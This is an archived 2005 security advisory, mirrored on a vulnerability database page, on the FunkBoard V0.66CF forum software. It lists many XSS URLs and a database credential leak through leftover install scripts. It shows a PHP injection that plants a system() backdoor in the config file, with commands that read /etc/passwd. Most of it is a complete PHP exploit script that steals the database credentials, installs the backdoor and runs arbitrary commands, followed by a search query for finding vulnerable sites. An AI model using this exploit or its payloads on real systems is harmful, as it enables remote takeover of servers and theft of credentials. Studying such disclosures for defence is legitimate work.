Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

funkboard066.txt

🗓️ 10 Aug 2005 00:00:00Reported by rgodType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 35 Views

FunkBoard V0.66CF security issues: XSS, database disclosure, remote code executio

Code
`FunkBoard V0.66CF (possibly prior versions) cross site scripting,   
possible database username/password disclosure & board takeover,  
possible remote code execution  
  
  
software:  
author site: http://www.[path_to_funkboard].co.uk/  
  
xss:  
http://[target]/[path_to_funkboard]/editpost.php?fbusername="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/editpost.php?fbpassword="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/prefs.php?fbpassword="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/prefs.php?fbusername="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbusername="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbpassword="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&subject="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbusername="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbpassword="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/profile.php?fbusername="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/profile.php?fbpassword="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?fbusername="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?fmail="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?www="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?icq="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?yim="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?location="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?sex="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?interebbies="><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?sig=</textarea><script>alert(document.cookie)</script>  
http://[target]/[path_to_funkboard]/register.php?aim="><script>alert(document.cookie)</script>  
  
path disclosure:   
http://[target]/[path_to_funkboard]/images/forums.php  
  
database username & password disclosure:  
  
during installation is not remembered to delete the mysql_install script and the installation  
do not delete it, usually:  
  
http://[target]/[path]/admin/mysql_install.php   
  
or  
  
http://[target]/[path]/admin/pg_install.php  
  
there, a user can see database clear text username & password ...  
  
Then, the script let the user proceed to the next page, where he can reset funkboard administator   
username & password. Now the script faults, because some tables exist, etc.  
So user can go back and setting a new database name for installation, guessing among other  
installations on the server...  
Once Installation succeeded he can set new admin username e password then login at this page:  
  
http://[target]/[path]/[path_to_funkboard]/admin/index.php  
  
Now the user can edit templates and append some evil javascript code.  
  
  
remote code execution:  
  
look at this code in mysql_install.php :  
  
$infoout = "<?php\n\n// server name, eg. localhost\n\$server = '$server1';\n// your database's name\n\$dbname = '$dbname1';\n// your username to access that database\n\$dbuser = '$dbuser1';";  
$infoout.= "\n// your password to access that database\n\$dbpass = '$dbpass1';\n\n// a contact email for when errors arise\n\$email = '$email1';";  
$infoout.= "\n\n// database engine- 'mysql' or 'postgres'\n\$dbtype='$dbtype1';\n\n?>";  
  
echo "Writing Config File<br>";  
unlink ("../info.php");  
  
$outname="../info.php";  
$file = fopen($outname,"w+");  
fputs($file, $infoout);  
fclose($file);  
  
clearly, you can inject php code, example:  
  
go to http://[target]/[path]/admin/mysql_install.php   
  
in email field (not checked) write:  
  
[email protected]'; error_reporting(0); system($HTTP_GET_VARS[command]); echo '  
  
press continue...  
  
now look at info.php, the config file in main directory, you have:  
  
<?php  
  
// server name, eg. localhost  
$server = 'localhost';  
// your database's name  
$dbname = 'dbname';  
// your username to access that database  
$dbuser = 'dbuser';  
// your password to access that database  
$dbpass = 'dbpassword';  
  
// a contact email for when errors arise  
$email = '[email protected]'; error_reporting(0); system($HTTP_GET_VARS[command]); echo '';  
  
// database engine- 'mysql' or 'postgres'  
$dbtype='mysql';  
  
?>  
  
so, you have a backdoor on target system...  
  
you can launch commands by this urls:  
  
http://localhost:30/funkboard/info.php?command=ls%20-la  
  
to list directories...  
  
http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd  
  
to see /etc/passwd file  
  
this is my proof of concept exploit:  
  
<?php  
/* FunkBoard V0.66CF (possibly prior versions) remote code execution  
by rgod  
site: http://rgod.altervista.org  
  
  
make these changes in php.ini if you have troubles  
with this script:  
allow_call_time_pass_reference = on  
register_globals = on */  
error_reporting(0);  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout", 2);  
ob_implicit_flush (1);  
  
echo '<head><title>FunkBoard V0.66CF remote commands execution</title>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">  
<style type="text/css">  
<!--  
body,td,th {color: #00FF00;}  
body {background-color: #000000;}  
.Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }  
.Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;  
font-weight: bold;  
font-style: italic;  
}  
-->  
</style></head>  
<body>  
<p class="Stile6">FunkBoard V0.66CF (possibly prior versions) remote commands execution</p>  
<p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a></p>  
<table width="84%" >  
<tr>  
<td width="43%">  
<form name="form1" method="post" action="'.$PHP_SELF.'?path=value&host=value&port=value&command=value&proxy=value">  
<p>  
<input type="text" name="host">  
<span class="Stile5">hostname (ex: www.sitename.com) </span></p>  
<p>  
<input type="text" name="path">  
<span class="Stile5">path (ex: /funkboard/ or /forum/ just /) </span></p>  
<p>  
<input type="text" name="port">  
<span class="Stile5">specify a port other than 80 (default value) </span></p>  
<p>  
<input type="text" name="command">  
<span class="Stile5">a Unix command, example: ls -la to list directories, cat /etc/passwd to show passwd file </span></p>  
<p>  
<input type="text" name="proxy">  
<span class="Stile5">send exploit through an HTTP proxy (ip:port) </span></p>  
<p>  
<input type="submit" name="Submit" value="go!">  
</p>  
</form></td>  
</tr>  
</table>  
</body>  
</html>';  
  
function show($headeri)  
{  
$ii=0;  
$ji=0;  
$ki=0;  
$ci=0;  
echo '<table border="0"><tr>';  
while ($ii <= strlen($headeri)-1)  
{  
$datai=dechex(ord($headeri[$ii]));  
if ($ji==16) {  
$ji=0;  
$ci++;  
echo "<td>&nbsp;&nbsp;</td>";  
for ($li=0; $li<=15; $li++)  
{ echo "<td>".$headeri[$li+$ki]."</td>";  
}  
$ki=$ki+16;  
echo "</tr><tr>";  
}  
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else  
{echo "<td>".$datai."</td> ";}  
$ii++;  
$ji++;  
}  
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)  
{ echo "<td>&nbsp&nbsp</td>";  
}  
  
for ($li=$ci*16; $li<=strlen($headeri); $li++)  
{ echo "<td>".$headeri[$li]."</td>";  
}  
  
echo "</tr></table>";  
}  
  
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';  
  
if (($path<>'') and ($host<>'') and ($command<>''))  
{  
  
  
if ($port=='') {$port=80;}  
if ($proxy=='')  
{$packet="GET ".$path."admin/mysql_install.php HTTP/1.1\r\n";}  
else  
{  
$c = preg_match_all($proxy_regex,$proxy,$is_proxy);  
if ($c==0) {  
echo 'check the proxy...<br>';  
die;  
}  
else  
{$packet="GET http://".$host.$path."admin/mysql_install.php HTTP/1.0\r\n";}  
}  
$packet.="Accept: *//*\r\n";  
$packet.="Accept-Encoding: text/plain\r\n";  
$packet.="Host: ".$host."\r\n\r\n";  
$packet.="Connection: Close\r\n\r\n";  
show($packet);  
if ($proxy=='')  
{$fp=fsockopen(gethostbyname($host),$port);}  
else  
{$parts=explode(':',$proxy);  
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';  
$fp=fsockopen($parts[0],$parts[1]);  
if (!$fp) { echo 'No response from proxy...';  
die;  
}  
}  
fputs($fp,$packet);  
$data='';  
if ($proxy=='')  
{  
while (!feof($fp))  
{  
$data.=fgets($fp);  
}  
}  
else  
{  
$data='';  
while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))  
{  
$data.=fread($fp,1);  
}  
  
}  
fclose($fp);  
show($data);  
echo '<br>';  
  
if (!eregi('HTTP/1.1 200 OK',$data)) {echo 'Error...see packet dump'; die;}  
  
//************************extract values from form********************************  
  
$parts=explode('value="',$data);  
for ($i=0; $i<=count($parts)-1; $i++)  
{  
$p[$i]=explode('"',$parts[$i]);  
  
if ($i==2) {$server1=$p[$i][0];}  
if ($i==3) {$dbname1=$p[$i][0];}  
if ($i==4) {$dbuser1=$p[$i][0];}  
if ($i==5) {$dbpass1=$p[$i][0];}  
if ($i==6)  
{  
if (eregi('CHECKED',$parts[$i]))  
{ $dbtype1='mysql';}  
else  
{ $dbtype1='postgres';}  
}  
if ($i==8) {$e=$p[$i][0];}  
}  
  
echo 'Server: '.$server1.'<br>';  
echo 'DbName: '.$dbname1.'<br>';  
echo 'DbUser: '.$dbuser1.'<br>';  
echo 'DbPass: '.$dbpass1.'<br>';  
echo 'DbType: '.$dbtype1.'<br>';  
echo 'Email : '.$e.'<br>';  
  
$data="server1=".urlencode($server1)."&dbname1=".urlencode($dbname1)."&dbuser1=";  
$data.=urlencode($dbuser1)."&dbpass1=".urlencode($dbpass1)."&dbtype1=".urlencode($dbtype1)."&email1=".urlencode($e);  
$data.=urlencode("'; error_reporting(0); system(".'$HTTP_GET_VARS[command]'."); echo'");  
$data.="&action=Continue2";  
  
if ($proxy=='')  
{$packet="POST ".$path."admin/mysql_install.php HTTP/1.1\r\n";}  
else  
{  
$c = preg_match_all($proxy_regex,$proxy,$is_proxy);  
if ($c==0) {  
echo 'check the proxy...<br>';  
die;  
}  
else  
{$packet="POST http://".$host.$path."admin/mysql_install.php HTTP/1.1\r\n";}  
}  
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";  
$packet.="Referer: http://".$host.":".$port.$path."mysql_install.php\r\n";  
$packet.="Accept-Language: it\r\n";  
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";  
$packet.="Accept-Encoding: gzip, deflate\r\n";  
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Content-Length: ".strlen($data)."\r\n";  
$packet.="Connection: Keep-Alive\r\n";  
$packet.="Cache-Control: no-cache\r\n\r\n";  
$packet.=$data;  
show($packet);  
  
  
if ($proxy=='')  
{$fp=fsockopen(gethostbyname($host),$port);}  
else  
{$parts=explode(':',$proxy);  
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';  
$fp=fsockopen($parts[0],$parts[1]);  
if (!$fp) { echo 'No response from proxy...';  
die;  
}  
  
}  
fputs($fp,$packet);  
$data='';  
while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))  
{  
$data.=fread($fp,1);  
}  
fclose($fp);  
show($data);  
  
  
if ($proxy=='')  
{$packet="GET ".$path."info.php?command=".urlencode($command)." HTTP/1.1\r\n";}  
else  
{  
$c = preg_match_all($proxy_regex,$proxy,$is_proxy);  
if ($c==0) {  
echo 'check the proxy...<br>';  
die;  
}  
else  
{$packet="GET http://".$host.$path."info.php?command=".urlencode($command)." HTTP/1.1\r\n";}  
}  
  
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";  
$packet.="Accept-Encoding: text/plain\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Connection: Close\r\n\r\n";  
show($packet);  
if ($proxy=='')  
{$fp=fsockopen(gethostbyname($host),$port);}  
else  
{$parts=explode(':',$proxy);  
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';  
$fp=fsockopen($parts[0],$parts[1]);  
if (!$fp) { echo 'No response from proxy...';  
die;  
}  
  
}  
fputs($fp,$packet);  
$data='';  
  
if ($proxy=='')  
{ $data='';  
while (!feof($fp))  
{  
$data.=fgets($fp);  
}  
}  
else  
{  
$data='';  
while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))  
{  
$data.=fread($fp,1);  
}  
  
}  
  
fclose($fp);  
if (eregi('HTTP/1.1 200 OK',$data))  
{echo 'Exploit sent...<br> If FunkBoard is vulnerable <br>';  
echo 'you will see '.htmlentities($command).' output inside HTML...<br><br>';  
}  
else  
{echo 'Error, see output...';}  
echo nl2br(htmlentities($data));  
  
  
$data="server1=".urlencode($server1)."&dbname1=".urlencode($dbname1)."&dbuser1=";  
$data.=urlencode($dbuser1)."&dbpass1=".urlencode($dbpass1)."&dbtype1=".urlencode($dbtype1)."&email1=".urlencode($e);  
$data.="&action=Continue2";  
  
if ($proxy=='')  
{$packet="POST ".$path."admin/mysql_install.php HTTP/1.1\r\n";}  
else  
{  
$c = preg_match_all($proxy_regex,$proxy,$is_proxy);  
if ($c==0) {  
echo 'check the proxy...<br>';  
die;  
}  
else  
{$packet="POST http://".$host.$path."admin/mysql_install.php HTTP/1.1\r\n";}  
}  
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, *//*\r\n";  
$packet.="Referer: http://".$host.":".$port.$path."mysql_install.php\r\n";  
$packet.="Accept-Language: it\r\n";  
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";  
$packet.="Accept-Encoding: gzip, deflate\r\n";  
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";  
$packet.="Host: ".$host."\r\n";  
$packet.="Content-Length: ".strlen($data)."\r\n";  
$packet.="Connection: Keep-Alive\r\n";  
$packet.="Cache-Control: no-cache\r\n\r\n";  
$packet.=$data;  
show($packet);  
if ($proxy=='')  
{$fp=fsockopen(gethostbyname($host),$port);}  
else  
{$parts=explode(':',$proxy);  
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';  
$fp=fsockopen($parts[0],$parts[1]);  
if (!$fp) { echo 'No response from proxy...';  
die;  
}  
  
}  
fputs($fp,$packet);  
$data='';  
while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))  
{  
$data.=fread($fp,1);  
}  
fclose($fp);  
show($data);  
  
}  
?>  
  
  
  
googledork: "Powered by FunkBoard"  
  
  
rgod  
site: http://rgod.altervista.org  
mail: [email protected]  
  
  
  
  
  
  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4
funkboardsecurityxssdatabasedisclosureremote code execution
35